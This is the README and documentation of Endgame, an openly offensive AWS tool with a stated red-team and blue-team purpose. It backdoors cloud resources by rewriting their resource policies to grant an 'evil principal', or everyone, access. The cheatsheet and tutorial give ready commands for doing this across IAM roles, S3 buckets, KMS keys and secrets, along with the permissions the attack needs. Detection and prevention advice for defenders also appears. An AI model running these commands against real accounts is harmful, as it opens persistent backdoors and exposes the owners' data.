Endgame is an attack tool, but it was written with a specific purpose. We wrote this tool for the following audiences:
1. **AWS**: We want AWS to empower their customers with the capabilities to fight these attacks. Our recommendations are outlined in the [Recommendations to AWS](#recommendations-to-aws) section.
2. **AWS Customers and their customers**: It is better to have risks be more easily understood and know how to mitigate those risks than to force people to fight something novel. By increasing awareness about Resource Exposure and excessive permissions, we can protect ourselves against attacks where the attackers previously held the advantage and AWS customers were previously left blind.
3. **Blue Teams**: Defense teams can leverage the guidance around user-agent detection, API call detection, and behavioral detection outlined in the [Recommendations to Blue Teams](#recommendations-to-blue-teams) section.
4. **Red Teams**: This will make for some very eventful red team exercises. Make sure you give the Blue Team kudos when they catch you!
## Supported Backdoors
Endgame can create backdoors for resources in any of the services listed in the table below.
Note: At the time of this writing, [AWS Access Analyzer](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html) does **NOT** support auditing **11 out of the 18 services** that Endgame attacks. Given that Access Analyzer is intended to detect this exact kind of violation, we kindly suggest to the AWS Team that they support all resources that can be attacked using Endgame. 😊
| Backdoor Resource Type | Endgame | [AWS Access Analyzer Support][1] |
|---------------------------------------------------------|---------|----------------------------------|
| [ACM Private CAs](https://endgame.readthedocs.io/en/latest/risks/acm-pca/) | ✅ | ❌ |
| [CloudWatch Resource Policies](https://endgame.readthedocs.io/en/latest/risks/logs/) | ✅ | ❌ |
| [EBS Volume Snapshots](https://endgame.readthedocs.io/en/latest/risks/ebs/) | ✅ | ❌ |
| [EC2 AMIs](https://endgame.readthedocs.io/en/latest/risks/amis/) | ✅ | ❌ |
| [ECR Container Repositories](https://endgame.readthedocs.io/en/latest/risks/ecr/) | ✅ | ❌ |
| [EFS File Systems](https://endgame.readthedocs.io/en/latest/risks/efs/) | ✅ | ❌ |
| [ElasticSearch Domains](https://endgame.readthedocs.io/en/latest/risks/es/) | ✅ | ❌ |
| [Glacier Vault Access Policies](https://endgame.readthedocs.io/en/latest/risks/glacier/) | ✅ | ❌ |
| [IAM Roles](https://endgame.readthedocs.io/en/latest/risks/iam-roles/) | ✅ | ✅ |
| [KMS Keys](https://endgame.readthedocs.io/en/latest/risks/kms/) | ✅ | ✅ |
| [Lambda Functions](docs/risks/lambda-functions.md) | ✅ | ✅ |
| [Lambda Layers](https://endgame.readthedocs.io/en/latest/risks/lambda-layers/) | ✅ | ✅ |
| [RDS Snapshots](https://endgame.readthedocs.io/en/latest/risks/rds-snapshots/) | ✅ | ❌ |
| [S3 Buckets](https://endgame.readthedocs.io/en/latest/risks/s3/) | ✅ | ✅ |
| [Secrets Manager Secrets](https://endgame.readthedocs.io/en/latest/risks/secretsmanager/) | ✅ | ✅ |
| [SES Sender Authorization Policies](https://endgame.readthedocs.io/en/latest/risks/ses/) | ✅ | ❌ |
| [SQS Queues](https://endgame.readthedocs.io/en/latest/risks/sns/) | ✅ | ✅ |
| [SNS Topics](https://endgame.readthedocs.io/en/latest/risks/sqs/) | ✅ | ❌ |
# Cheatsheet
```bash
# this will ruin your day
endgame smash --service all --evil-principal "*"
# This will show you how your day could have been ruined
endgame smash --service all --evil-principal "*" --dry-run
# Atone for your sins
endgame smash --service all --evil-principal "*" --undo
# Consider maybe atoning for your sins
endgame smash --service all --evil-principal "*" --undo --dry-run
# List resources available for exploitation
endgame list-resources --service all
# Expose specific resources
endgame expose --service s3 --name computers-were-a-mistake
```
# Tutorial
The prerequisite for an attacker running Endgame is they have access to AWS API credentials for the victim account which have privileges to update resource policies.
Endgame can run in two modes, `expose` or `smash`. The less-destructive `expose` mode is surgical, updating the resource policy on a single attacker-defined resource to include a back door to a principal they control (or the internet if they're mean).
`smash`, on the other hand, is more destructive (and louder). `smash` can run on a single service or all supported services. In either case, for each service it enumerates a list of resources in that region, reads the current resource policy on each, and applies a new policy which includes the "evil principal" the attacker has specified. The net effect of this is that depending on the privileges they have in the victim account, an attacker can insert dozens of back doors which are not controlled by the victim's IAM policies.
## Installation
* pip3
```bash
pip3 install --user endgame
```
* Homebrew (this will not work until the repository is public)
```bash
brew tap salesforce/endgame https://github.com/salesforce/endgame
brew install endgame
```
Now you should be able to execute Endgame from command line by running `endgame --help`.
### Shell Completion
* To enable Bash completion, put this in your `~/.bashrc`:
```bash
eval "$(_ENDGAME_COMPLETE=source endgame)"
```
* To enable ZSH completion, put this in your `~/.zshrc`:
```bash
eval "$(_ENDGAME_COMPLETE=source_zsh endgame)"
```
## Step 1: Setup
* First, authenticate to AWS CLI using credentials to the victim's account.
* Set the environment variables for `EVIL_PRINCIPAL` (required). Optionally, set the environment variables for `AWS_REGION` and `AWS_PROFILE`.
```bash
# Set `EVIL_PRINCIPAL` environment variable to the rogue IAM User or
# Role that you want to give access to.
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
# If you don't supply these values, these will be the defaults.
export AWS_REGION="us-east-1"
export AWS_PROFILE="default"
```
## Step 2: Create Demo Infrastructure
This program makes modifications to live AWS Infrastructure, which can vary from account to account. We have bootstrapped some of this for you using [Terraform](https://www.terraform.io/intro/index.html).
> **Warning: This will create real AWS infrastructure and will cost you money. Be sure to create this in a test account, and destroy the Terraform resources afterwards.**
```bash
# To create the demo infrastructure
make terraform-demo
```
## Step 3: List Victim Resources
You can use the `list-resources` command to list resources in the account that you can backdoor.
* Examples:
```bash
# List IAM Roles, so you can create a backdoor via their AssumeRole policies
endgame list-resources -s iam
# List S3 buckets, so you can create a backdoor via their Bucket policies
endgame list-resources --service s3
# List all resources across services that can be backdoored
endgame list-resources --service all
```
## Step 4: Backdoor specific resources
* Use the `--dry-run` command first to test it without modifying anything:
```bash
endgame expose --service iam --name test-resource-exposure --dry-run
```
* To create the backdoor to that resource from your rogue account, run the following:
```bash
endgame expose --service iam --name test-resource-exposure
```
Example output:
<p align="center">
<img src="docs/images/add-myself-foreal.png">
</p>
## Step 5: Roll back changes
* If you want to atone for your sins (optional) you can use the `--undo` flag to roll back the changes.
```bash
endgame expose --service iam --name test-resource-exposure --undo
```
<p align="center">
<img src="docs/images/add-myself-undo.png">
</p>
## Step 6: Smash your AWS Account to Pieces
* To expose every exposable resource in your AWS account, run the following command.
> Warning: If you supply the argument `--evil-principal *` or the environment variable `EVIL_PRINCIPAL=*`, it will expose the account to the internet. If you do this, it is possible that an attacker could assume your privileged IAM roles, take over the other [supported resources](#supported-backdoors) present in that account, or incur a massive bill. As such, you might want to set `--evil-principal` to your own AWS user/role in another account.
```bash
endgame smash --service all --dry-run
endgame smash --service all
endgame smash --service all --undo
```
## Step 7: Destroy Demo Infrastructure
* Now that you are done with the tutorial, don't forget to clean up the demo infrastructure.
```bash
# Destroy the demo infrastructure
make terraform-destroy
```
# Recommendations
## Recommendations to AWS
While [Cloudsplaining](https://opensource.salesforce.com/cloudsplaining/) (a Salesforce-produced AWS IAM assessment tool), showed us the pervasiveness of least privilege violations in AWS IAM across the industry, Endgame shows us how it is already easy for attackers. These are not new attacks, but AWS's ability to **detect** _and_ **prevent** these attacks falls short of what customers need to protect themselves.
[AWS Access Analyzer](https://docs.aws.amazon.com/IAM/latest/UserGuide/what-is-access-analyzer.html) is a tool produced by AWS that helps you identify the resources in your organization and accounts, such as Amazon S3 buckets or IAM roles, that are shared with an external entity. In short, it **detects** instances of this resource exposure problem. However, it does not by itself meet customer need, due to current gaps in coverage and the lack of preventative tooling to compliment it.
At the time of this writing, [AWS Access Analyzer](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html) does **NOT** support auditing **11 out of the 18 services** that Endgame attacks. Given that Access Analyzer is intended to detect this exact kind of violation, we kindly suggest to the AWS Team that they support all resources that can be attacked using Endgame. 😊
The lack of preventative tooling makes this issue more difficult for customers. Ideally, customers should be able to say, _"Nobody in my AWS Organization is allowed to share **any** resources that can be exposed by Endgame outside of the organization, unless that resource is in an exemption list."_ This **should** be possible, but it is not. It is not even possible to use [AWS Service Control Policies (SCPS)](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps.html) - AWS's preventative guardrails service - to prevent `sts:AssumeRole` calls from outside your AWS Organization. The current SCP service limit of 5 SCPs per AWS account compounds this problem.
We recommend that AWS take the following measures in response:
* Increase Access Analyzer Support to cover the resources that can be exposed via Resource-based Policy modification, AWS RAM resource sharing, and resource-specific sharing APIs (such as RDS snapshots, EBS snapshots, and EC2 AMIs)
* Support the usage of `sts:AssumeRole` to prevent calls from outside your AWS Organization, with targeted exceptions.
* Add IAM Condition Keys to all the IAM Actions that are used to perform Resource Exposure. These IAM Condition Keys should be used to prevent these resources from (1) being shared with the public **and** (2) being shared outside of your `aws:PrincipalOrgPath`.
* Expand the current limit of 5 SCPs per AWS account to 200. (for comparison, the Azure equivalent - Azure Policies - has a limit of [200 Policy or Initiative Assignments per subscription](https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/azure-subscription-service-limits#azure-policy-limits))
* Improve the AWS SCP service to support an "Audit" mode that would record in CloudTrail whether API calls would have been denied had the SCP not been in audit mode. This would increase customer adoption and make it easier for customers to both pilot and roll out new guardrails. (for comparison, the Azure Equivalent - Azure Policies - already [supports Audit mode](https://docs.microsoft.com/en-us/azure/governance/policy/concepts/effects#audit).
* Create GuardDuty rules that detect **public** exposure of resources. This may garner more immediate customer attention than Access Analyzer alerts, as they are considered high priority by Incident Response teams, and some customers have not onboarded to Access Analyzer yet.
## Recommendations to Blue Teams
### Detection
There are three general methods that blue teams can use to **detect** AWS Resource Exposure Attacks. See the links below for more detailed guidance per method.
1. [User Agent Detection (Endgame specific)](https://endgame.readthedocs.io/en/latest/detection/#user-agent-detection)
2. [API call detection](https://endgame.readthedocs.io/en/latest/detection/#api-call-detection)
3. [Behavioral-based detection](https://endgame.readthedocs.io/en/latest/detection/#behavioral-based-detection)
4. [AWS Access Analyzer](https://endgame.readthedocs.io/en/latest/detection/#aws-access-analyzer)
While (1) User Agent Detection is specific to the usage of Endgame, (2) API Call Detection, (3) Behavioral-based detection, and (4) AWS Access Analyzer are strategies to detect Resource Exposure Attacks, regardless of if the attacker is using Endgame to do it.
### Prevention
There are 6 general methods that blue teams can use to **prevent** AWS Resource Exposure Attacks. See the links below for more detailed guidance per method.
1. [Use AWS KMS Customer-Managed Keys to encrypt resources](https://endgame.readthedocs.io/en/latest/prevention/#use-aws-kms-customer-managed-keys)
2. [Leverage Strong Resource-based policies](https://endgame.readthedocs.io/en/latest/prevention/#leverage-strong-resource-based-policies)
3. [Trusted Accounts Only](https://endgame.readthedocs.io/en/latest/prevention/#trusted-accounts-only)
4. [Inventory which IAM Principals are capable of Resource Exposure](https://endgame.readthedocs.io/en/latest/prevention/#inventory-which-iam-principals-are-capable-of-resource-exposure)
5. [AWS Service Control Policies](https://endgame.readthedocs.io/en/latest/prevention/#aws-service-control-policies)
6. [Prevent AWS RAM External Principals](https://endgame.readthedocs.io/en/latest/prevention/#prevent-aws-ram-external-principals)
### Further Blue Team Reading
Additional information on AWS resource policies, how this tool works in the victim account, and identification/containment suggestions is [here](docs/resource-policy-primer.md).
# IAM Permissions
The IAM Permissions listed below are used to create these backdoors.
You don't need **all** of these permissions to run the tool. You just need enough from each service. For example, `s3:ListAllMyBuckets`, `s3:GetBucketPolicy`, and `s3:PutBucketPolicy` are all the permissions needed to leverage this tool to expose S3 buckets.
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "IAmInevitable",
"Effect": "Allow",
"Action": [
"acm-pca:DeletePolicy",
"acm-pca:GetPolicy",
"acm-pca:ListCertificateAuthorities",
"acm-pca:PutPolicy",
"ec2:DescribeImageAttribute",
"ec2:DescribeImages",
"ec2:DescribeSnapshotAttribute",
"ec2:DescribeSnapshots",
"ec2:ModifySnapshotAttribute",
"ec2:ModifyImageAttribute",
"ecr:DescribeRepositories",
"ecr:DeleteRepositoryPolicy",
"ecr:GetRepositoryPolicy",
"ecr:SetRepositoryPolicy",
"elasticfilesystem:DescribeFileSystems",
"elasticfilesystem:DescribeFileSystemPolicy",
"elasticfilesystem:PutFileSystemPolicy",
"es:DescribeElasticsearchDomainConfig",
"es:ListDomainNames",
"es:UpdateElasticsearchDomainConfig",
"glacier:GetVaultAccessPolicy",
"glacier:ListVaults",
"glacier:SetVaultAccessPolicy",
"iam:GetRole",
"iam:ListRoles",
"iam:UpdateAssumeRolePolicy",
"kms:GetKeyPolicy",
"kms:ListKeys",
"kms:ListAliases",
"kms:PutKeyPolicy",
"lambda:AddLayerVersionPermission",
"lambda:AddPermission",
"lambda:GetPolicy",
"lambda:GetLayerVersionPolicy",
"lambda:ListFunctions",
"lambda:ListLayers",
"lambda:ListLayerVersions",
"lambda:RemoveLayerVersionPermission",
"lambda:RemovePermission",
"logs:DescribeResourcePolicies",
"logs:DeleteResourcePolicy",
"logs:PutResourcePolicy",
"rds:DescribeDbClusterSnapshots",
"rds:DescribeDbClusterSnapshotAttributes",
"rds:DescribeDbSnapshots",
"rds:DescribeDbSnapshotAttributes",
"rds:ModifyDbSnapshotAttribute",
"rds:ModifyDbClusterSnapshotAttribute",
"s3:GetBucketPolicy",
"s3:ListAllMyBuckets",
"s3:PutBucketPolicy",
"secretsmanager:GetResourcePolicy",
"secretsmanager:DeleteResourcePolicy",
"secretsmanager:ListSecrets",
"secretsmanager:PutResourcePolicy",
"ses:DeleteIdentityPolicy",
"ses:GetIdentityPolicies",
"ses:ListIdentities",
"ses:ListIdentityPolicies",
"ses:PutIdentityPolicy",
"sns:AddPermission",
"sns:ListTopics",
"sns:GetTopicAttributes",
"sns:RemovePermission",
"sqs:AddPermission",
"sqs:GetQueueUrl",
"sqs:GetQueueAttributes",
"sqs:ListQueues",
"sqs:RemovePermission"
],
"Resource": "*"
}
]
}
```
# Contributing
Want to contribute back to endgame? This section outlines our philosophy, the test suite, and issue tracking, and will house more details on the development flow and design as the tool matures.
**Impostor Syndrome Disclaimer**
Before we get into the details: We want your help. No, really.
There may be a little voice inside your head that is telling you that you're not ready to be an open source contributor; that your skills aren't nearly good enough to contribute. What could you possibly offer a project like this one?
We assure you -- the little voice in your head is wrong. If you can write code at all, you can contribute code to open source. Contributing to open source projects is a fantastic way to advance one's coding skills. Writing perfect code isn't the measure of a good developer (that would disqualify all of us!); it's trying to create something, making mistakes, and learning from those mistakes. That's how we all improve.
We've provided some clear Contribution Guidelines that you can read here. The guidelines outline the process that you'll need to follow to get a patch merged. By making expectations and process explicit, we hope it will make it easier for you to contribute.
And you don't just have to write code. You can help out by writing documentation, tests, or even by giving feedback about this work. (And yes, that includes giving feedback about the contribution guidelines.)
## Testing
### Unit tests
* Run [pytest](https://docs.pytest.org/en/stable/) with the following:
```bash
make test
```
### Security tests
* Run [bandit](https://bandit.readthedocs.io/en/latest/) with the following:
```bash
make security-test
```
### Integration tests
After making any modifications to the program, you can run a full-fledged integration test, using this program against your own test infrastructure in AWS.
* First, set your environment variables
```bash
# Set the environment variable for the username that you will create a backdoor for.
export EVIL_PRINCIPAL="arn:aws:iam::999988887777:user/evil"
export AWS_REGION="us-east-1"
export AWS_PROFILE="default"
```
* Then run the full-fledged integration test:
```bash
make integration-test
```
This does the following:
* Sets up your local dev environment (see `setup-dev`) in the `Makefile`
* Creates the Terraform infrastructure (see `terraform-demo` in the `Makefile`)
* Runs `list-resources`, `exploit --dry-run`, and `expose` against this live infrastructure
* Destroys the Terraform infrastructure (see `terraform-destroy` in the `Makefile`)
Note that the `expose` command will not expose the resources to the world - it will only expose them to your rogue user, not to the world.
# References
* [Example Splunk Dashboard for AWS Resource Exposure](https://kmcquade.github.io/rick/)
* [AWS Access Analyzer Supported Resources](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html)
* [AWS Exposable Resources](https://github.com/SummitRoute/aws_exposable_resources)
* [Moto: A library that allows you to easily mock out tests based on AWS Infrastructure](http://docs.getmoto.org/en/latest/docs/moto_apis.html)
* [Imposter Syndrome Disclaimer created by Adrienne Friend](https://github.com/adriennefriend/imposter-syndrome-disclaimer)
[1]: https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html

7
SECURITY.md Normal file
View File

@ -0,0 +1,7 @@
## Security
Please report any security issue to [security@salesforce.com](mailto:security@salesforce.com)
as soon as it is discovered. This library limits its runtime dependencies in
order to reduce the total cost of ownership as much as can be, but all consumers
should remain vigilant and have their security stakeholders review all third-party
products (3PP) like this one and their dependencies.

View File

@ -0,0 +1,30 @@
# ACM PCA Activation
While the rest of the infrastructure deployed via the Terraform resources is ready to go as soon as `make terraform-demo` is finished, you will need to do some manual follow-up steps in ACM PCA for the demo to work.
Follow the steps below to activate the PCA. After following these steps, you can successfully perform the Resource Exposure activities.
## Create Terraform Resources
* Run the Terraform code to generate the example AWS resources.
```bash
make terraform-demo
```
## Follow-up steps to activate ACM PCA
The ACM Private Certificate Authority will have been created - but you won't be able to use it yet. Per [the Terraform docs on [aws_acmpca_certificate_authority](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/acmpca_certificate_authority), "Creating this resource will leave the certificate authority in a `PENDING_CERTIFICATE status`, which means it cannot yet issue certificates."
* To solve this, navigate to the AWS Console in the selected region. Observe how the certificate authority is in the `PENDING_CERTIFICATE` status, as shown in the image below.
> ![ACM PCA Pending Status](../images/acm-pca-action-required.png)
* Select "Install a CA Certificate to activate your CA", as shown in the image above, marked by the **red box**.
* A wizard will pop up. Use the default settings and hit **"Next"**, then **"Confirm and Install"**.
* Observe that your root CA certificate was installed successfully, and that the STATUS of the CA is ACTIVE and able to issue private certificates.
.. and now you are ready to pwn that root certificate with this tool 😈

26
docs/appendices/faq.md Normal file
View File

@ -0,0 +1,26 @@
# FAQ
## Where does AWS Access Analyzer fall short?
[AWS Access Analyzer](https://docs.aws.amazon.com/IAM/latest/UserGuide/what-is-access-analyzer.html) analyzes new or updated resource-based policies within 30 minutes of policy updates (triggered by CloudTrail log entries), and during periodic scans (every 24 hours). If an attacker leverages the `expose` or `smash` commands but quickly rolls back the changes with `--undo`, you might not find out about the attack with Access Analyzer until 30 minutes later.
However, Access Analyzer can still be especially useful in ensuring that if attacks do gain a foothold in your infrastructure. If the attacker ran Endgame or perform resource exposure attacks without the tool, you can still use Access Analyzer to alert on those changes so you can respond to the issue, instead of allowing a persistent backdoor.
The primary drawback with AWS Access Analyzer is that it does not support 11/17 resource types currently supported by Endgame. It also does not support AWS RAM Resource sharing outside of your trust zone, or resource-specific sharing APIs (such as RDS snapshots, EBS snapshots, and EC2 AMIs).
See the [Recommendations to AWS](../recommendations-to-aws.md) section for more details.
## Related Tools in the Ecosystem
### Attack tools
[Pacu](https://github.com/RhinoSecurityLabs/pacu/) is an AWS exploitation framework created by [Spencer Gietzen](https://twitter.com/SpenGietz), designed for testing the security of Amazon Web Services environments. The [iam__backdoor_assume_role](https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/iam__backdoor_assume_role/main.py) module was a particular point of inspiration for `endgame` - it creates backdoors in IAM roles by creating trust relationships with one or more roles in the account, allowing those users to assume those roles after they are no longer using their current set of credentials.
### Detection/scanning tools
[Cloudsplaining](https://opensource.salesforce.com/cloudsplaining/), is an AWS IAM assessment tool produced by [Kinnaird McQuade](https://twitter.com/kmcquade3) that showed us the pervasiveness of least privilege violations in AWS IAM across the industry. Two findings of particular interest to `endgame` are Resource Exposure and Service Wildcards. Resource Exposure describes actions that grant access to share resources with rogue accounts or to the internet - i.e., modifying Resource-based Policies, sharing resources with AWS RAM, or via resource-specific sharing APIs (such as RDS snapshots, EBS snapshots, or EC2 AMIs).
### Prevention tools
[Policy Sentry](https://engineering.salesforce.com/salesforce-cloud-security-automating-least-privilege-in-aws-iam-with-policy-sentry-b04fe457b8dc) is a least-privilege
IAM Authoring tool created by [Kinnaird McQuade](https://twitter.com/kmcquade3) that demonstrated to the industry how to write least privilege IAM policies at scale, restricting permissions according to specific resources and access levels.

View File

@ -0,0 +1,378 @@
## Actions
### ACM PCA
* Permissions
acm-pca:CreatePermission
acm-pca:DeletePermission
acm-pca:DeletePolicy
acm-pca:PutPolicy
* `certificate-authority`: `arn:${Partition}:acm-pca:${Region}:${Account}:certificate-authority/${CertificateAuthorityId}`
### API Gateway
apigateway:UpdateRestApiPolicy
* ARN: `arn:${Partition}:apigateway:${Region}::${ApiGatewayResourcePath}`
### AWS Backup
backup:DeleteBackupVaultAccessPolicy
backup:PutBackupVaultAccessPolicy
* `backupVault`: `arn:${Partition}:backup:${Region}:${Account}:backup-vault:${BackupVaultName}`
### Chime
chime:DeleteVoiceConnectorTerminationCredentials
chime:PutVoiceConnectorTerminationCredentials
### CloudSearch
cloudsearch:UpdateServiceAccessPolicies
### CodeArtifact
codeartifact:DeleteDomainPermissionsPolicy
codeartifact:DeleteRepositoryPermissionsPolicy
### CodeBuild
codebuild:DeleteResourcePolicy
codebuild:DeleteSourceCredentials
codebuild:ImportSourceCredentials
codebuild:PutResourcePolicy
### CodeGuru Profiler
codeguru-profiler:PutPermission
codeguru-profiler:RemovePermission
### CodeStar
codestar:AssociateTeamMember
codestar:CreateProject
codestar:DeleteProject
codestar:DisassociateTeamMember
codestar:UpdateTeamMember
### Cognito Identity
cognito-identity:CreateIdentityPool
cognito-identity:DeleteIdentities
cognito-identity:DeleteIdentityPool
cognito-identity:GetId
cognito-identity:MergeDeveloperIdentities
cognito-identity:SetIdentityPoolRoles
cognito-identity:UnlinkDeveloperIdentity
cognito-identity:UnlinkIdentity
cognito-identity:UpdateIdentityPool
### Deeplens
deeplens:AssociateServiceRoleToAccount
### Directory Service
ds:CreateConditionalForwarder
ds:CreateDirectory
ds:CreateMicrosoftAD
ds:CreateTrust
ds:ShareDirectory
### EC2
#### VPC Endpoint Network Interfaces
ec2:CreateNetworkInterfacePermission
ec2:DeleteNetworkInterfacePermission
ec2:ModifyVpcEndpointServicePermissions
#### EC2 Snapshots
ec2:ModifySnapshotAttribute
ec2:ResetSnapshotAttribute
### ECR
* Repositories
ecr:DeleteRepositoryPolicy
ecr:SetRepositoryPolicy
ecr-public:SetRepositoryPolicy
### EFS
elasticfilesystem:DeleteFileSystemPolicy
elasticfilesystem:PutFileSystemPolicy
### EMR
elasticmapreduce:PutBlockPublicAccessConfiguration
### ElasticSearch
es:CreateElasticsearchDomain
es:UpdateElasticsearchDomainConfig
### Glacier
glacier:AbortVaultLock
glacier:CompleteVaultLock
glacier:DeleteVaultAccessPolicy
glacier:InitiateVaultLock
glacier:SetDataRetrievalPolicy
glacier:SetVaultAccessPolicy
### Glue
glue:DeleteResourcePolicy
glue:PutResourcePolicy
### Greengrass
greengrass:AssociateServiceRoleToAccount
### Health
health:DisableHealthServiceAccessForOrganization
health:EnableHealthServiceAccessForOrganization
### IAM Role Trust Policy
iam:AttachRolePolicy
iam:CreatePolicy
iam:CreatePolicyVersion
iam:CreateRole
iam:DeletePolicy
iam:DeletePolicyVersion
iam:DeleteRole
iam:DeleteRolePermissionsBoundary
iam:DeleteRolePolicy
iam:DetachRolePolicy
iam:PassRole
iam:PutRolePermissionsBoundary
iam:PutRolePolicy
iam:UpdateAssumeRolePolicy
iam:UpdateRole
### Image Builder
imagebuilder:GetContainerRecipePolicy
imagebuilder:PutComponentPolicy
imagebuilder:PutContainerRecipePolicy
imagebuilder:PutImagePolicy
imagebuilder:PutImageRecipePolicy
### IOT
iot:AttachPolicy
iot:AttachPrincipalPolicy
iot:DetachPolicy
iot:DetachPrincipalPolicy
iot:SetDefaultAuthorizer
iot:SetDefaultPolicyVersion
### IOT Sitewise
iotsitewise:CreateAccessPolicy
iotsitewise:DeleteAccessPolicy
iotsitewise:UpdateAccessPolicy
### KMS
kms:CreateGrant
kms:PutKeyPolicy
kms:RetireGrant
kms:RevokeGrant
### Lake Formation
lakeformation:BatchGrantPermissions
lakeformation:BatchRevokePermissions
lakeformation:GrantPermissions
lakeformation:PutDataLakeSettings
lakeformation:RevokePermissions
### Lambda
lambda:AddLayerVersionPermission
lambda:AddPermission
lambda:DisableReplication
lambda:EnableReplication
lambda:RemoveLayerVersionPermission
lambda:RemovePermission
### Logs (CloudWatch)
logs:DeleteResourcePolicy
logs:PutResourcePolicy
### MediaStore
mediastore:DeleteContainerPolicy
mediastore:PutContainerPolicy
### OpsWorks
opsworks:SetPermission
opsworks:UpdateUserProfile
### QuickSight
quicksight:CreateAdmin
quicksight:CreateGroup
quicksight:CreateGroupMembership
quicksight:CreateIAMPolicyAssignment
quicksight:CreateUser
quicksight:DeleteGroup
quicksight:DeleteGroupMembership
quicksight:DeleteIAMPolicyAssignment
quicksight:DeleteUser
quicksight:DeleteUserByPrincipalId
quicksight:DescribeDataSetPermissions
quicksight:DescribeDataSourcePermissions
quicksight:RegisterUser
quicksight:UpdateDashboardPermissions
quicksight:UpdateDataSetPermissions
quicksight:UpdateDataSourcePermissions
quicksight:UpdateGroup
quicksight:UpdateIAMPolicyAssignment
quicksight:UpdateTemplatePermissions
quicksight:UpdateUser
### RAM
ram:AcceptResourceShareInvitation
ram:AssociateResourceShare
ram:CreateResourceShare
ram:DeleteResourceShare
ram:DisassociateResourceShare
ram:EnableSharingWithAwsOrganization
ram:RejectResourceShareInvitation
ram:UpdateResourceShare
### Redshift
redshift:AuthorizeSnapshotAccess
redshift:CreateClusterUser
redshift:CreateSnapshotCopyGrant
redshift:JoinGroup
redshift:ModifyClusterIamRoles
redshift:RevokeSnapshotAccess
### Route53 Resolver
route53resolver:PutResolverRulePolicy
### S3
s3:BypassGovernanceRetention
s3:DeleteAccessPointPolicy
s3:DeleteBucketPolicy
s3:ObjectOwnerOverrideToBucketOwner
s3:PutAccessPointPolicy
s3:PutAccountPublicAccessBlock
s3:PutBucketAcl
s3:PutBucketPolicy
s3:PutBucketPublicAccessBlock
s3:PutObjectAcl
s3:PutObjectVersionAcl
### S3 outposts
s3-outposts:DeleteAccessPointPolicy
s3-outposts:DeleteBucketPolicy
s3-outposts:PutAccessPointPolicy
s3-outposts:PutBucketPolicy
s3-outposts:PutObjectAcl
### Secrets Manager
secretsmanager:DeleteResourcePolicy
secretsmanager:PutResourcePolicy
secretsmanager:ValidateResourcePolicy
### Signer
signer:AddProfilePermission
signer:ListProfilePermissions
signer:RemoveProfilePermission
### SNS
sns:AddPermission
sns:CreateTopic
sns:RemovePermission
sns:SetTopicAttributes
### SQS
sqs:AddPermission
sqs:CreateQueue
sqs:RemovePermission
sqs:SetQueueAttributes
### SSM
ssm:ModifyDocumentPermission
### SSO
sso:AssociateDirectory
sso:AssociateProfile
sso:CreateApplicationInstance
sso:CreateApplicationInstanceCertificate
sso:CreatePermissionSet
sso:CreateProfile
sso:CreateTrust
sso:DeleteApplicationInstance
sso:DeleteApplicationInstanceCertificate
sso:DeletePermissionSet
sso:DeletePermissionsPolicy
sso:DeleteProfile
sso:DisassociateDirectory
sso:DisassociateProfile
sso:ImportApplicationInstanceServiceProviderMetadata
sso:PutPermissionsPolicy
sso:StartSSO
sso:UpdateApplicationInstanceActiveCertificate
sso:UpdateApplicationInstanceDisplayData
sso:UpdateApplicationInstanceResponseConfiguration
sso:UpdateApplicationInstanceResponseSchemaConfiguration
sso:UpdateApplicationInstanceSecurityConfiguration
sso:UpdateApplicationInstanceServiceProviderConfiguration
sso:UpdateApplicationInstanceStatus
sso:UpdateDirectoryAssociation
sso:UpdatePermissionSet
sso:UpdateProfile
sso:UpdateSSOConfiguration
sso:UpdateTrust
sso-directory:AddMemberToGroup
sso-directory:CreateAlias
sso-directory:CreateGroup
sso-directory:CreateUser
sso-directory:DeleteGroup
sso-directory:DeleteUser
sso-directory:DisableUser
sso-directory:EnableUser
sso-directory:RemoveMemberFromGroup
sso-directory:UpdateGroup
sso-directory:UpdatePassword
sso-directory:UpdateUser
sso-directory:VerifyEmail
### Storage Gateway
storagegateway:DeleteChapCredentials
storagegateway:SetLocalConsolePassword
storagegateway:SetSMBGuestPassword
storagegateway:UpdateChapCredentials
### WAF
waf:DeletePermissionPolicy
waf:PutPermissionPolicy
waf-regional:DeletePermissionPolicy
waf-regional:PutPermissionPolicy
wafv2:CreateWebACL
wafv2:DeletePermissionPolicy
wafv2:DeleteWebACL
wafv2:PutPermissionPolicy
wafv2:UpdateWebACL

View File

@ -0,0 +1,25 @@
### Backdoors via AWS Resource Access Manager
By default, AWS RAM allows you to share resources with **any** AWS Account.
Supported resource types are listed in the AWS documentation [here](https://docs.aws.amazon.com/ram/latest/userguide/shareable.html).
## Status
This exploit method is not currently implemented. Please come back later when we've implemented it.
To get notified when it is available, you can take one of the following methods:
1. In GitHub, select "Watch for new releases"
2. Follow the author [@kmcquade](https://twitter.com/kmcquade3) on Twitter. He will announce when this feature is available 😃
### Resources not on roadmap
| Resource Type | Support Status |
|-------------------------------|----------------|
| S3 Objects | ❌ |
| CloudWatch Destinations | ❌ |
| Glue | ❌ |
* **S3 Buckets**: We do not plan on sharing individual S3 objects given the sheer amount of bandwidth that would require. If you want this feature, I suggest scripting it.
* **CloudWatch Destinations**: Modifying CloudWatch destination policies would only provide the benefit of delivering victim logs to attacker accounts - but that would have to be open permanently. This is not as destructive or useful to an attacker as the rest of these exploits, so I am not including it here.
* **Glue**: According to the [AWS documentation on AWS Glue Resource Policies](https://docs.aws.amazon.com/glue/latest/dg/glue-resource-policies.html), _"An AWS Glue resource policy can only be used to manage permissions for Data Catalog resources. You can't attach it to any other AWS Glue resources such as jobs, triggers, development endpoints, crawlers, or classifiers"_. This kind of data access is not as useful as destructive actions, at first glance. We are open to supporting this resource, but on pull requests only.

View File

@ -0,0 +1,38 @@
# Terraform Demo Infrastructure
This program makes modifications to live AWS Infrastructure, which can vary from account to account. We have bootstrapped some of this for you.
> 🚨This will create real AWS infrastructure and will cost you money! 🚨
> _Note: It is not exposed to rogue IAM users or to the internet at first. That will only happen after you run the exposure commands._
## Prerequisites
* Valid credentials to an AWS account
